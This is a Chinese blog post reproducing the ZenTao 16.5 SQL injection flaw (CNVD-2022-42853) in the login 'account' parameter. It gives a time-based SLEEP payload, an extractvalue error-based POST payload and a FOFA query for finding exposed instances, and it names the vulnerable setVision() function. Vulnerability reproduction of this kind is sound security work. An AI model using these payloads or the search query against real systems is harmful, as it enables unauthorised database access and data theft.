禅道16.5 SQL注入(CNVD-2022-42853)

zxl2605

已于 2023-02-15 10:12:45 修改

阅读量945

点赞数 2

分类专栏： # 漏洞复现文章标签： sql php 数据库

于 2023-02-15 10:11:42 首次发布

原文链接：https://blog.csdn.net/qq_59975439/article/details/128049948?spm=1001.2014.3001.5506

版权

漏洞复现专栏收录该内容

54 篇文章 11 订阅

订阅专栏

漏洞描述

禅道16.5的版本未对输入的account参数内容作过滤校验，导致攻击者拼接恶意SQL语句执行。

漏洞编号：CNVD-2022-42853

禅道（ZenTaoPMS）受影响版本：

开源版：16.5，16.5beta1    
企业版：6.5，6.5beta1    
旗舰版：3.0，3.0beta1

POC：

这里有两种，但核心内容相同

第一种

延时POC:

http://ip:port/index.php?account=admin' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))a)-- b

第二种

payload：

url: /zentao/user-login.html
 
POST: account=admin'+and+(select+extractvalue(1,concat(0x7e,(MD5(110)),0x7e)))#

实战

下面对开源版本进行示例

FoFo搜索

body="/js/all.js?v=16.5"

判断依据如下

如上所示，很明显，开源版本16.5，没问题

示例一

延时注入成功，这里我使用的是burp联动sqlmap插件，方便快捷

剩下的不做演示

示例二

示例地址不变

或者用burp，效果差不多，可以看一下

这里就不继续了

简要说明

就是对禅道16.5 版本的用户名登陆处存在sql注入，漏洞点出现在以上版本的

zbox\app\zentao\framework\base\router.class.php文件里，具体函数为setVision()

该函数未对外界传入的account参数做过滤直接拼接SQL语句，触发SQL注入漏洞

可以参考大佬的说明：https://github.com/ce-automne/CNVD-2022-42853

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

zxl2605

关注关注

2
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
禅道16.5 SQL注入(CNVD-2022-42853)

禅道16.5 SQL注入(CNVD-2022-42853)
复制链接

扫一扫

专栏目录

禅道826版本SQL注入，登录绕过以及禅道826后台GetShell的小技巧

weixin_54556126的博客

02-26

1200

SQL注入由 orderBy($order) 函数过滤不严格导致。但是，这个函数对传进的参数进行了一系列过滤，导致 getshell 的条件比较苛刻。不甘心，于是乎找了一个比较好利用的地方。我只是以这个模块的一个函数为例，其它未提到的地方仍然很有可能存在注入。　　一、问题的根源　　问题出现在 limit($limit) 函数，它对传进的参数没有经过任何过滤就直接拼接成SQL语句进行查询。 // D:\wamp\www\zentao826\lib\base\dao\dao.class.php

禅道身份认证绕过漏洞(QVD-2024-15263)复现

最新发布

fly夏天的博客

06-19

873

QVD-2024-15263 禅道身份认证绕过漏洞复现和原理介绍。

参与评论您还未登录，请先登录后发表或查看评论

禅道V16.5SQL注入漏洞（CNVD-2022-42853）

RestoreJustice的博客

03-23

726

禅道项目管理软件是一款国产的、基于LGPL协议、开源免费的项目管理软件，它集产品管理、项目管理、测试管理于一体，同时还包含了事务管理、组织管理等诸多功能，是中小型企业项目管理的首选，基于自主的PHP开发框架──ZenTaoPHP而成，第三方开发者或企业可非常方便的开发插件或者进行定制。在登录处未对用户输入的account参数内容作过滤校验，导致攻击者拼接恶意SQL语句执行，攻击者可利用漏洞获取数据库敏感信息。

sql注入攻击linux下的xampp网站,从SQL注入到Getshell：记一次禅道系统的渗透

weixin_32830601的博客

05-14

538

SQL注入分析网上之前有过一个9.1.2的orderBy函数的分析，但是没想到9.2.1也存在此问题，(2018.3.2号看到目前最新版本是9.8.1)。出问题的地方是此文件的orderBy函数：\lib\base\dao\dao.class.php对于limit后未做严格的过滤与判断，然后拼接到了order by后面导致产生注入.$order = join(',', $orders) . ' '...

sql注入合集

Aiwin的博客

05-08

901

sql注入合集，持续收集。

向日葵RCE漏洞（CNVD-2022-10270）检测工具

02-19

向日葵RCE漏洞（CNVD-2022-10270）检测工具，已经编译好，命令行运行即可 xrkrce.exe -h 127.0.0.1

宏景HCM SQL注入漏洞(CNVD-2023-08743) ，hrms加解密工具

11-07

宏景HCM SQL注入漏洞(CNVD-2023-08743) ，hrms加解密工具。需要 Java1.8 环境，执行如下命令启动 HrmsTool 工具， -e 是加密， -d 是解密。 $ java -jar HrmsTool.jar Usage: java -jar HrmsTool.jar -e xxx java ...

CNVD-2019-34241 SQL注入.MD

03-20

CNVD-2019-34241 SQL注入.MD

泛微OA xmlrpcServlet接口任意文件读取漏洞（CNVD-2022-43245）

12-25

泛微OA xmlrpcServlet接口任意文件读取漏洞（CNVD-2022-43245），可以指定文件路径进行读取，并提供检测方案

向日葵CNVD-2022-10207安装包

01-25

标题中的“向日葵CNVD-2022-10207安装包”指的是一个针对名为“向日葵”的远程控制软件的安全补丁或更新包，与CNVD（中国国家信息安全漏洞库）编号2022-10207相关。这通常意味着该安装包修复了向日葵软件中发现的一...

php中sql注入漏洞示例 sql注入漏洞修复

10-26

主要介绍了php中sql注入漏洞示例，大家在开发中一定要注意

sql注入合集_禅道sql注入(2)，妈妈再也不用担心我找工作了

m0_61369360的博客

04-06

556

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！【完整版领取方式在文末！！

【禅道 16.5 router.class.php SQL注入漏洞复现】

weixin_45530380的博客

08-14

532

【代码】【禅道 16.5 router.class.php SQL注入漏洞复现】

sql注入合集_禅道sql注入(1)，网络安全开发究竟该如何学习

m0_61369360的博客

04-06

560

class block extends control { public function __construct($moduleName = ‘’, KaTeX parse error: Expected '}', got 'EOF' at end of input: …:\_\_construct(moduleName, $methodName); this−>selfCall=strpos(this->selfCall = strpos(this−>selfCall=strpos(this->serv

sql注入合集_禅道sql注入，2024-2024蚂蚁金服网络安全面试真题解析

m0_61369360的博客

04-06

834

CNVD-2023-08743：宏景HCM SQL注入漏洞复现 [附POC]

薛定谔嘚喵博客

11-07

1929

宏景HCM系统 categories处存在SQL注入漏洞，未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令，从而窃取数据库敏感信息。

limit 后注入_从SQL注入到Getshell：记一次禅道系统的渗透

weixin_39605326的博客

11-29

151

此过程为某站点的渗透记录，过程一波三折，但归根结底都是粗心大意造成的，不过自我认为在这个排坑的过程中也学习到了很多。确认版本首先可以通过接口来确认一下当前禅道的版本。http://example.com/index.php?mode=getconfigSQL注入分析网上之前有过一个9.1.2的orderBy函数的分析，但是没想到9.2.1也存在此问题，(2018.3.2号看到目前最新版本是9.8....

禅道linux一键安装漏洞,禅道免登陆SQL注入漏洞复现

weixin_39552768的博客

05-17

1392

一、漏洞简介该漏洞影响版本为禅道8.2--9.2.1，禅道项目管理软件集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体，是一款功能完备的项目管理软件，完美地覆盖了项目管理的核心流程。漏洞出现在系统orm框架中，在拼接order by的语句过程的时候，未对limit部分过滤并直接拼接，导致攻击者构造执行SQL语句。在mysql权限配置不当的情况下，攻击者可利用该漏洞获取webshe...

cnvd-2023-69477

12-08

cnvd-2023-69477是一个由国家信息安全漏洞共享平台发布的漏洞通告编号，该漏洞通告是针对特定软件或硬件产品的安全漏洞描述和修复建议的一个标识。根据cnvd-2023-69477的描述，这个漏洞可能会导致系统的信息泄露、拒绝服务或者远程代码执行等安全风险。建议用户及时关注厂商发布的安全补丁，并严格按照厂商提供的修复建议进行操作，确保系统的安全性。对于系统管理员和安全工程师来说，他们需要关注cnvd-2023-69477的具体描述和风险评估，及时评估自身系统是否受到影响，快速制定修复计划并进行安全补丁的安装和验证。同时，建议关注该漏洞的后续动态，以便获取更多关于漏洞的详细信息和最新修复方案，及时做好安全防护工作。总之，cnvd-2023-69477作为一个漏洞通告，提醒着用户和安全从业人员关注系统安全，及时采取措施保护系统，防范潜在的安全风险。